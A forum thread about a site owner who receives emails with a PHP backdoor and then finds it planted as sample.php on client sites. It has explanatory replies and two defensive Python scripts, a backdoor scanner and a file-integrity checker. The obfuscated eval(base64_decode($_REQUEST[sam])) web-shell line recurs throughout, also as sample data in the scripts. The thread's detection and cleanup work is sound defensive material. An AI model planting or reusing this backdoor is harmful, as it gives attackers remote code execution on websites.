Attack Script via email?

Hi all,

Recently, I have started receiving php scripts via email.


(no subject)
Inbox

< … script language="php"> $a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval($a($_REQUEST[sam]));</script … >


My sites have been getting hacked lately. Any ideas on what type of attack this is and how I can stop it?

Thanks

A vulnerable Contact form?

I use Contact 7 in Wordpress, but I removed the form page from the site. They can still access the plugin?

I just spoke with my hosting Live Chat. I couldn’t see the headers in the e-mail. The guy said it appears to be from Amazon. Not malicious. When I Google the script, however, it comes up “attack and defence” (sic) script.

Sounds odd that Amazon would go to the trouble of the "$a = " when all they need to do is
base64_decode($_REQUEST[sam])

And why REQUEST (both POST and GET)?

Do you know what “sam” is?

surface to air missile?

Google showed it to be Wordpress ‘simple ads manager.’

Also brought up

I took a quick look through Contact 7 and found no “sam”.

“simple ad manager” is likely the vulnerable script.

Seeing as

IMHO it is time to delete that plugin at least until it gets patched.

And if a backdoor has been uploaded to your site, time to backup your database and do a thorough replacement of all folders and files.

Sorry … I meant Google linked ‘sam’ with simple ad manager. I don’t use Simple Ad Manager. But, yeah, it appears as if a start-from-scratch strategy is the best.

What is the PHP chr function used for? What could they gain? I don’t have proprietary information or anything. And I really do not understand this lead … http://www.hackingwithphp.com/4/7/3/converting-to-and-from-ascii

In this case it is being used to make base64_decode not be easily noticeable.

As for Amazon, no benefit that I can see. Why would they want to hide that if it’s legit?

If a script-kiddie on the other hand, it would make them feel “clever” and it would get by filters that look for the use of that function name as a string.

Irony is that most look for the function name “eval” so it’s moot here. The code will still trigger a red flag.

That… would be a security hole a mile wide. eval(base64_decode($_REQUEST[sam]));… "Take WHATEVER I put on the URL in the ‘sam’ variable and execute it. Whatever it is." sam = “unlink(index.php)”? Blow up your index file. Dump your password file to the screen? Sure thing! Open up a hole into your database? Not a problem.
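The two points made above (the chr() chain exists only to hide the string base64_decode from simple grep-style filters, and eval() fed straight from $_REQUEST executes whatever the request carries) can be turned into a check that decodes the chr() chains first and then matches the eval pattern, recovering the decoder function and the request key (sam in the quoted snippet). The following is an added example in Python; it is not code from the thread or from any WordPress plugin. The sample files are constructed here: sample.php mirrors the one-liner quoted in the thread, while variant.php (an undisguised form using $_POST) and clean.php are invented for the demonstration.

```python
"""Decode chr()-built strings in PHP source and flag eval() fed from a request superglobal."""
import os
import re
from typing import Dict, Optional

# Constructed sample files for the demo (not read from a real server).
# sample.php mirrors the one-liner quoted in the thread; variant.php and
# clean.php are invented here to show the undisguised form and a non-hit.
SAMPLE_FILES: Dict[str, str] = {
    "sample.php": (
        '<script language="php">\n'
        "$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95)"
        ".chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);\n"
        "eval($a($_REQUEST[sam]));</script>"
    ),
    "variant.php": "<?php eval(base64_decode($_POST['cmd'])); ?>",
    "clean.php": '<?php echo "hello"; ?>',
}

CHR_CALL = re.compile(r"chr\(\s*(\d{1,3})\s*\)")
# A run of chr(n) calls joined by PHP's "." concatenation operator.
CHR_CHAIN = re.compile(r"chr\(\s*\d{1,3}\s*\)(?:\s*\.\s*chr\(\s*\d{1,3}\s*\))*")
# $name = 'literal';  (single-quoted literals only, which is all this pattern needs)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'((?:[^'\\]|\\.)*)'\s*;")
# eval( <callee>( $_REQUEST|$_GET|$_POST|$_COOKIE [ key ] ...
EVAL_FROM_REQUEST = re.compile(
    r"eval\s*\(\s*(\$?\w+)\s*\(\s*\$_(REQUEST|GET|POST|COOKIE)\s*\[\s*['\"]?(\w+)['\"]?\s*\]",
    re.IGNORECASE,
)


def decode_chr_chains(src: str) -> str:
    """Replace every chr(n).chr(n)... chain with the single-quoted string it builds."""
    def rebuild(match: "re.Match[str]") -> str:
        text = "".join(chr(int(n)) for n in CHR_CALL.findall(match.group(0)))
        return "'" + text.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CHR_CHAIN.sub(rebuild, src)


def scan_source(src: str) -> Optional[Dict[str, str]]:
    """Return details of an eval-from-request backdoor, or None if the source is clean."""
    decoded = decode_chr_chains(src)
    literals = dict(ASSIGN.findall(decoded))  # e.g. {"a": "base64_decode"} after decoding
    match = EVAL_FROM_REQUEST.search(decoded)
    if not match:
        return None
    callee, superglobal, param = match.group(1), match.group(2).upper(), match.group(3)
    if callee.startswith("$"):  # resolve a variable used as the decoder function name
        callee = literals.get(callee[1:], callee)
    return {"decoder": callee, "superglobal": superglobal, "param": param}


def scan_files(files: Dict[str, str]) -> Dict[str, Dict[str, str]]:
    """Scan a name -> source mapping and keep only the files that hit."""
    hits: Dict[str, Dict[str, str]] = {}
    for name, src in files.items():
        hit = scan_source(src)
        if hit:
            hits[name] = hit
    return hits


def scan_directory(root: str) -> Dict[str, Dict[str, str]]:
    """Read every *.php under root (for example a web root) and scan it."""
    files: Dict[str, str] = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            if name.lower().endswith(".php"):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    files[path] = fh.read()
    return scan_files(files)


if __name__ == "__main__":
    for name, hit in scan_files(SAMPLE_FILES).items():
        print(f"{name}: eval({hit['decoder']}($_{hit['superglobal']}[{hit['param']}]))")
```

Run against a real web root with scan_directory("/path/to/public_html"). The point of decoding before matching is exactly the one made above: a filter that only looks for the literal string base64_decode misses the chr() form, while a filter that looks for eval catches it regardless, so the scan keys on eval plus a request superglobal and reports the decoder and parameter name as evidence.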

Agreed. But not knowing where “sam” is coming from, until determined what to do?

I’m thinking adding a DEFINE for “sam” as a CONSTANT into the config file might help.

I got several of these emails and went back and looked to see if all of them were looking for ‘sam.’ One was not. It was

<?php =chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101); eval(());

Okay, I run multiple sites for clients and I just

  1. deleted the Wordpress install
  2. used cPanel to protect the directory
  3. Deleted all files in the base directory
  4. waited (I have been having problems with my host’s cpanel directory-password protection option)

I just re-checked site, and there is a ‘sample’ php file on there, and it contains the one line: < … script language="php">
$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);
eval($a($_REQUEST[sam]));

So email amazon’s spoofer email (stop-spoofing@amazon.com), attach the email in question, and tell them that someone appears to be using one of their clients’ contact systems as an attempt at hacking a site. (though why the email came to YOU is a good question.)

Why it came to me? Not sure why me specifically. My hosting account was suspended recently due to a high volume of CPU usage. These were just portfolio-type design sites, so I went through and deleted all the files and deleted the Wordpress installation. I changed the FTP password, but evidently my master account pw has been obtained because within 2 hours, this maddening sample.php file has appeared.

Wait… this code was in a file that you didn’t create, sitting on your server?

Contact your hosting company again. Tell them their server’s been breached, and they need to do a complete system sweep on all accounts on the box.

Yes, I’m live-chatting with them at this moment. 70% of my client sites have this weird sample.php file on them.
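The sample.php that keeps reappearing across client sites is the kind of thing a file-integrity baseline catches: hash the web root right after a clean rebuild, store the list off the server, and diff it on a schedule, so that a new or modified file shows up within the next sweep instead of being found by accident. The following is an added example in Python, not code from the thread or from any hosting panel. The directory layout, file contents and the simulated tampering are constructed for the demonstration; the backdoor line mirrors the one quoted in the thread.

```python
"""File-integrity baseline for a web root: catch files that appear or change between sweeps."""
import hashlib
import os
import tempfile
from typing import Dict, Set

# Constructed content for the demo; the backdoor mirrors the one-liner quoted in the thread.
BACKDOOR = (
    '<script language="php">\n'
    "$a=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95)"
    ".chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);\n"
    "eval($a($_REQUEST[sam]));</script>\n"
)


def snapshot(root: str) -> Dict[str, str]:
    """Map every file under root (path relative to root, '/' separated) to its SHA-256."""
    digests: Dict[str, str] = {}
    for dirpath, _dirs, names in os.walk(root):
        for name in names:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            digests[os.path.relpath(full, root).replace(os.sep, "/")] = digest
    return digests


def diff_snapshots(baseline: Dict[str, str], current: Dict[str, str]) -> Dict[str, Set[str]]:
    """Files added, removed or modified since the baseline was taken."""
    base_paths, cur_paths = set(baseline), set(current)
    return {
        "added": cur_paths - base_paths,
        "removed": base_paths - cur_paths,
        "changed": {p for p in base_paths & cur_paths if baseline[p] != current[p]},
    }


def _write(root: str, rel: str, content: str) -> None:
    """Helper for the demo: create rel under root, making parent directories as needed."""
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write(content)


def demo() -> Dict[str, Set[str]]:
    """Build a throwaway 'web root', baseline it, then simulate the backdoor drop."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "index.php", "<?php echo 'portfolio'; ?>\n")
        _write(root, "wp-content/plugins/contact/contact.php", "<?php // plugin ?>\n")
        baseline = snapshot(root)  # in real use: save this off the server
        # What the thread describes: a new sample.php shows up. The tampered
        # index.php is constructed here as well, to exercise the 'changed' case.
        _write(root, "sample.php", BACKDOOR)
        _write(root, "index.php", "<?php echo 'portfolio'; ?>\n" + BACKDOOR)
        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, sorted(paths))
```

In real use, run snapshot() on the actual web root after the rebuild, keep the resulting mapping somewhere the hosting account cannot reach (a compromised master password, as suspected above, means anything stored on the server can be edited along with the site), and compare a fresh snapshot against it on a cron schedule. A non-empty "added" or "changed" set for PHP files you did not deploy is the signal to escalate to the host, since, as noted in the replies, a file reappearing across many accounts points at the server rather than one site.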

Yes, it could very well be a shell with group affecting every sharing site and not only your site in particular.

The host really needs to know this.